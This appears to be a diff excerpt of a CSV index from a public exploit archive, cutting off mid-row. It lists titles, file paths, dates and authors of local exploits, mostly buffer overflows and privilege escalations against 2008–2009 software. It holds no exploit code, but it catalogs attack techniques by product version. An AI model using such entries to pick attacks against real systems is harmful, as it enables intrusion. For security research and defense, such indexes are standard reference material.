+5951,exploits/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,local,windows, +5979,exploits/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Local Privilege Escalation",2008-07-01,"lul-disclosure inc.",local,openbsd, +6030,exploits/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,local,windows, +6031,exploits/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC)",2008-07-08,Defsanguje,local,windows, +6032,exploits/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",local,linux, +6039,exploits/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,local,windows, +6106,exploits/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",local,windows, +6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",local,windows, +6188,exploits/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",local,windows, +6322,exploits/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - 'mx4' Local Buffer Overflow",2008-08-28,Koshi,local,windows, +6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows, +6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,local,windows, +6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,local,linux, +6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows, +6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)",2008-10-08,"Cesar Cerrudo",local,windows, +6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows, +6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows, +6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",local,windows, +6825,exploits/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)",2008-10-23,"Guido Landi",local,windows, +6831,exploits/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",local,windows, +6851,exploits/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation",2008-10-27,gat3way,local,linux, +6994,exploits/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,local,windows, +7006,exploits/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",local,windows, +7051,exploits/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Local Stack Buffer Overflow",2008-11-07,SkD,local,windows, +7054,exploits/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Local Privilege Escalation",2008-11-07,"NT Internals",local,windows, +7129,exploits/multiple/local/7129.sh,"Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalation",2008-11-15,kingcope,local,multiple, +7135,exploits/windows/local/7135.html,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",local,windows, +7171,exploits/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass",2008-11-20,SecurityReason,local,multiple, +7177,exploits/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Local Privilege Escalation",2008-11-20,"Jakub Wartak",local,linux, +40988,exploits/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",local,windows, +7264,exploits/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Local Privilege Escalation",2008-11-28,Abysssec,local,windows, +7309,exploits/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow",2008-11-30,SkD,local,windows, +7313,exploits/linux/local/7313.sh,"Debian - Symlink In Login Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",local,linux, +7329,exploits/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow",2008-12-03,Encrypt3d.M!nd,local,windows, +7334,exploits/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack",2008-12-03,DATA_SNIPER,local,windows, +7347,exploits/windows/local/7347.pl,"PEiD 0.92 - '.PE' File Universal Buffer Overflow",2008-12-05,SkD,local,windows, +7393,exploits/linux/local/7393.txt,"PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment",2008-12-09,gat3way,local,linux, +7492,exploits/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,local,windows, +7501,exploits/windows/local/7501.asp,"Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow",2008-12-17,"Guido Landi",local,windows, +7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple, +7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows, +7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",local,windows, +7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,local,windows, +7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,local,windows, +7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple, +7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,local,windows, +7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",local,freebsd, +7582,exploits/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,local,windows, +7608,exploits/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,local,windows, +7618,exploits/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",local,linux, +7646,exploits/multiple/local/7646.txt,"PHP 5.2.8 gd library - 'imageRotate()' Information Leak",2009-01-02,"Hamid Ebadi",local,multiple, +7651,exploits/windows/local/7651.py,"Destiny Media Player 1.61 - '.m3u' Local Stack Overflow",2009-01-03,His0k4,local,windows, +7654,exploits/windows/local/7654.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)",2009-01-04,Encrypt3d.M!nd,local,windows, +7655,exploits/windows/local/7655.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (2)",2009-01-04,sCORPINo,local,windows, +7656,exploits/windows/local/7656.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (3)",2009-01-04,Houssamix,local,windows, +7661,exploits/windows/local/7661.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (4)",2009-01-04,Stack,local,windows, +7662,exploits/windows/local/7662.py,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (5)",2009-01-04,suN8Hclf,local,windows, +7671,exploits/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,local,windows, +7675,exploits/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,local,multiple, +7676,exploits/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,local,multiple, +7677,exploits/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,local,multiple, +7681,exploits/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments' Code Execution",2009-01-06,"Paul Szabo",local,linux, +7684,exploits/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,local,windows, +7688,exploits/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,local,windows, +7692,exploits/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Local Buffer Overflow",2009-01-07,"Jeremy Brown",local,windows, +7695,exploits/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,local,windows, +7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,local,windows, +7707,exploits/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog Overflow (SEH)",2009-01-08,Cnaph,local,windows, +7713,exploits/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)",2009-01-09,Houssamix,local,windows, +7714,exploits/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)",2009-01-11,sCORPINo,local,windows, +7715,exploits/windows/local/7715.py,"VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow",2009-01-11,His0k4,local,windows, +7727,exploits/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow",2009-01-12,SkD,local,windows, +7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,local,windows, +7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,local,windows, +7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,local,windows, +7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,local,windows, +7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,local,windows, +7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,local,windows, +7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux, +7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux, +7888,exploits/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow",2009-01-28,Houssamix,local,windows, +7923,exploits/windows/local/7923.c,"Total Video Player 1.3.7 - '.m3u' Local Buffer Overflow",2009-01-29,SimO-s0fT,local,windows, +7929,exploits/windows/local/7929.c,"GOM Player 2.0.12 - '.pls' Universal Buffer Overflow",2009-01-30,Stack,local,windows, +7957,exploits/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Local Buffer Overflow",2009-02-03,SkD,local,windows, +7958,exploits/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,local,windows, +7973,exploits/windows/local/7973.pl,"Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow",2009-02-04,Houssamix,local,windows, +7974,exploits/windows/local/7974.c,"Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow",2009-02-04,"Single Eye",local,windows, +7975,exploits/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow",2009-02-04,LiquidWorm,local,windows, +7994,exploits/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,local,windows, +8010,exploits/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,local,windows, +8055,exploits/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,local,freebsd, +8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",local,multiple, +8074,exploits/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,local,multiple, +8108,exploits/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,local,osx, +8121,exploits/windows/local/8121.pl,"Hex Workshop 6.0 - '.hex' Local Code Execution",2009-02-27,DATA_SNIPER,local,windows, +8126,exploits/windows/local/8126.py,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)",2009-03-02,Encrypt3d.M!nd,local,windows, +8137,exploits/windows/local/8137.py,"Media Commands - '.m3u' Local Overwrite (SEH)",2009-03-02,His0k4,local,windows, +8138,exploits/windows/local/8138.c,"VUplayer 2.49 - '.cue' Local Buffer Overflow",2009-03-02,"Assed Edin",local,windows, +8158,exploits/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow",2009-03-05,SkD,local,windows, +8159,exploits/windows/local/8159.rb,"Media Commands - '.m3l' File Local Buffer Overflow",2009-03-05,Stack,local,windows, +8162,exploits/windows/local/8162.py,"Media Commands - '.m3u' Universal Overwrite (SEH)",2009-03-05,His0k4,local,windows, +8171,exploits/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - Playlist Universal Overwrite (SEH)",2009-03-09,His0k4,local,windows, +8174,exploits/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,local,windows, +8175,exploits/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - 'mksmonen.sys' Local Privilege Escalation",2009-03-09,"NT Internals",local,windows, +8176,exploits/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,local,windows, +8177,exploits/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,local,windows, +8178,exploits/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,local,windows, +8179,exploits/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,local,windows, +8189,exploits/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,local,windows, +8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows, +8201,exploits/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,local,windows, +8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows, +8231,exploits/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,local,windows, +8233,exploits/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,local,windows, +8234,exploits/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,local,windows, +8235,exploits/windows/local/8235.py,"Chasys Media Player 1.1 - '.m3u' Local Stack Overflow",2009-03-18,Encrypt3d.M!nd,local,windows, +8236,exploits/windows/local/8236.py,"Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)",2009-03-18,His0k4,local,windows, +8242,exploits/windows/local/8242.rb,"Chasys Media Player 1.1 - '.cue' Local Stack Overflow",2009-03-19,Stack,local,windows, +8246,exploits/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,local,windows, +8249,exploits/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,local,windows, +8250,exploits/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Local Privilege Escalation",2009-03-20,"NT Internals",local,windows, +8251,exploits/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,local,windows, +8261,exploits/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Local Privilege Escalation",2009-03-23,mu-b,local,freebsd, +8266,exploits/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,local,osx, +8267,exploits/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,local,windows, +8270,exploits/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,local,windows, +8274,exploits/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,local,windows, +8275,exploits/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,local,windows, +8280,exploits/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal",2009-03-24,"Black Security",local,windows, +8299,exploits/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Local Stack Overflow",2009-03-27,Encrypt3d.M!nd,local,windows, +8301,exploits/windows/local/8301.pl,"PowerCHM 5.7 - 'hhp' Local Buffer Overflow",2009-03-29,LiquidWorm,local,windows, +8303,exploits/linux/local/8303.c,"pam-krb5 < 3.13 - Local Privilege Escalation",2009-03-29,"Jon Oberheide",local,linux, +8311,exploits/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,Encrypt3d.M!nd,local,windows, +8312,exploits/windows/local/8312.py,"AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,local,windows, +8322,exploits/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,local,windows, +8343,exploits/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,local,windows, +8369,exploits/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation",2009-04-08,gat3way,local,linux, +8371,exploits/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow",2009-04-08,AlpHaNiX,local,windows, +8401,exploits/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - html Local Overwrite (SEH)",2009-04-13,dun,local,windows, +8410,exploits/windows/local/8410.pl,"RM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,local,windows, +8411,exploits/windows/local/8411.c,"WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,local,windows, +8412,exploits/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,local,windows, +8413,exploits/windows/local/8413.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow",2009-04-13,Stack,local,windows, +8416,exploits/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,local,windows, +8420,exploits/windows/local/8420.py,"BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)",2009-04-13,His0k4,local,windows, +8426,exploits/windows/local/8426.pl,"Shadow Stream Recorder - '.m3u' Universal Stack Overflow",2009-04-14,AlpHaNiX,local,windows, +8427,exploits/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow",2009-04-14,Stack,local,windows, +8444,exploits/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal Overwrite (SEH)",2009-04-15,dun,local,windows, +8456,exploits/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes",2009-04-16,"Alexander Kornbrust",local,multiple, +8470,exploits/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Local Buffer Overflow",2009-04-17,"Michael Brooks",local,linux, +8478,exploits/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)",2009-04-20,kingcope,local,linux, +8519,exploits/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)",2009-04-22,Stack,local,windows, +8520,exploits/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)",2009-04-22,His0k4,local,windows, +8527,exploits/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow",2009-04-23,Stack,local,windows, +8534,exploits/linux/local/8534.c,"libvirt_proxy 0.5.1 - Local Privilege Escalation",2009-04-27,"Jon Oberheide",local,linux, +8535,exploits/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,local,windows, +8536,exploits/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,local,windows, +8540,exploits/windows/local/8540.c,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,local,windows, +8541,exploits/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' Local Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,local,windows, +8572,exploits/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)",2009-04-30,"Jon Oberheide",local,linux, +8580,exploits/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,local,windows, +8582,exploits/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' Overwrite (SEH)",2009-04-30,His0k4,local,windows, +8583,exploits/windows/local/8583.py,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow",2009-05-01,His0k4,local,windows, +8589,exploits/windows/local/8589.py,"RM Downloader - '.smi' Local Stack Overflow",2009-05-01,"ThE g0bL!N",local,windows, +8590,exploits/windows/local/8590.py,"Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)",2009-05-01,His0k4,local,windows, +8591,exploits/windows/local/8591.py,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)",2009-05-01,Encrypt3d.M!nd,local,windows, +8592,exploits/windows/local/8592.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)",2009-05-01,Stack,local,windows, +8594,exploits/windows/local/8594.pl,"RM Downloader - '.smi' Universal Local Buffer Overflow",2009-05-01,Stack,local,windows, +8595,exploits/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - 'getIcon()' Memory Corruption",2009-05-04,Abysssec,local,windows, +8612,exploits/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",local,windows, +8620,exploits/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow",2009-05-05,Stack,local,windows, +8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,local,windows, +8628,exploits/windows/local/8628.pl,"RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8629,exploits/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8630,exploits/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8631,exploits/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8632,exploits/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8633,exploits/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8634,exploits/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow",2009-05-07,G4N0K,local,windows, +8637,exploits/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",local,windows, +8640,exploits/windows/local/8640.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow",2009-05-07,Hakxer,local,windows, +8641,exploits/multiple/local/8641.txt,"PHP - 'mb_ereg(i)_replace()' Evaluate Replacement String",2009-05-07,80vul,local,multiple, +8656,exploits/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Overwrite (SEH)",2009-05-11,His0k4,local,windows, +8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,local,windows, +8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,local,windows, +8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,local,windows, +8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",local,windows, +8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,local,windows, +8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,local,windows, +8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,local,linux, +8678,exploits/linux/local/8678.c,"Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation",2009-05-14,prdelka,local,linux, +8698,exploits/windows/local/8698.pl,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow",2009-05-15,hack4love,local,windows, +8701,exploits/windows/local/8701.py,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)",2009-05-15,His0k4,local,windows, +8770,exploits/windows/local/8770.py,"Winamp 5.55 - MAKI Script Universal Overwrite (SEH)",2009-05-22,His0k4,local,windows, +8772,exploits/windows/local/8772.pl,"Winamp 5.55 - MAKI script Universal Integer Overflow",2009-05-22,Encrypt3d.M!nd,local,windows, +8780,exploits/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,local,windows, +8782,exploits/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation",2009-05-26,"NT Internals",local,windows, +8783,exploits/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,local,windows, +8789,exploits/windows/local/8789.py,"Slayer 2.4 - 'skin' Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,local,windows, +8799,exploits/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass",2009-05-26,Abysssec,local,win_x86, +8833,exploits/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,local,hardware, +8863,exploits/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-06-03,"fl0 fl0w",local,windows, +8875,exploits/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Local Privilege Escalation",2009-06-04,"NT Internals",local,windows, +8881,exploits/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection",2009-06-05,Nine:Situations:Group,local,windows, +8896,exploits/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,local,osx, +8983,exploits/windows/local/8983.c,"DESlock+ 4.0.2 - 'dlpcrypt.sys' Local Kernel Ring0 Code Execution",2009-06-18,mu-b,local,windows, +9034,exploits/windows/local/9034.pl,"HT-MP3Player 